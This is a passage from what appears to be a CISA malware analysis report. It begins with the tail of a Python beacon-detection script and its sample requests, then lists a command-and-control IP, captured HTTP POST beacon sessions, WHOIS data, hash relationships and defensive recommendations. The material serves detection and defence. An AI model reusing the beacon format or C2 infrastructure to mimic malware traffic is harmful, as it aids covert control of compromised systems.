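    "\r\n"
    "vl=A093273633E2339332927212329A723242D6E6D346365E7226F246E76227271E265674D6469267477C02420"
)
SAMPLE_BENIGN = (
    "POST /login HTTP/1.1\r\n"
    "Host: intranet.example.test\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=alice&pass=hunter2"
)

if __name__ == "__main__":
    print(beacon_indicators(SAMPLE_BEACON))
    print(beacon_indicators(SAMPLE_BENIGN))
    print(classify_message("200" + SEP_SLASH + "19x.1xx.2xx.2xx" + SEP_PIPE + "WIN-HVMLL1IR74C/user01"))
```

The host and URI checks will go stale as soon as the actor rotates infrastructure; the user-agent plus "vl=" hex-only body pair is the part of the signature that is tied to the tool rather than to the server, so a proxy or IDS rule built from this should weight those two traits even when the host does not match.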

Screenshots

Figure 21 - The contents of the VBScript.

5.199.133.149

Tags

command-and-control

Ports
  • 80 TCP
HTTP Sessions
  • POST /jznkmustntblvmdvgcwbvqb HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 93

    Host: 5[.]199[.]133[.]149
  • POST /oeajgyxyxclqmfqayv HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 93

    Host: 5[.]199[.]133[.]149
Whois

Domain Name: SERVDISCOUNT-CUSTOMER.COM

Registry Domain ID: 1882350046_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.psi-usa.info

Registrar URL: http://www.psi-usa.info

Updated Date: 2021-10-28T07:05:37Z

Creation Date: 2014-10-27T07:58:37Z

Registry Expiry Date: 2022-10-27T07:58:37Z

Registrar: PSI-USA, Inc. dba Domain Robot

Registrar IANA ID: 151

Registrar Abuse Contact Email: domain-abuse@psi-usa.info

Registrar Abuse Contact Phone: +49.94159559482

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Name Server: NS1.NTDNS.DE

Name Server: NS2.NTDNS.DE

Name Server: NS3.NTDNS.DE

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of whois database: 2022-01-31T07:23:45Z <<<

Relationships
5.199.133.149 Connected_From d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
Description

The malware C2 IP address.

Relationship Summary

12db8bcee0... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
2471a039cb... Related_To ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
2471a039cb... Related_To 12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
ce9bd1acf3... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
ce9bd1acf3... Connected_To 185.183.96.7
185.183.96.7 Connected_From ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
b6133e04a0... Connected_To 185.117.75.34
185.117.75.34 Connected_From e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
185.117.75.34 Connected_From b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
192.210.191.188 Connected_From 5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
5bcdd42208... Connected_To 192.210.191.188
255e53af8b... Connected_To 185.183.96.44
185.183.96.44 Connected_From 255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
e7f6c7b91c... Connected_To 185.117.75.34
b1e30cce6d... Connected_To 185.118.164.21
185.118.164.21 Connected_From b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
185.118.164.21 Connected_From 42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
42ca7d3fcd... Connected_To 185.118.164.21
026868713d... Dropped c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
026868713d... Dropped f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
c2badcdfa9... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
f10471e15c... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
f10471e15c... Connected_To 88.119.170.124
88.119.170.124 Connected_From f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
4b2862a166... Contains d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
4b2862a166... Contains ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
ed988768f5... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
d77e268b74... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
d77e268b74... Connected_To 5.199.133.149
5.199.133.149 Connected_From d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

February 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.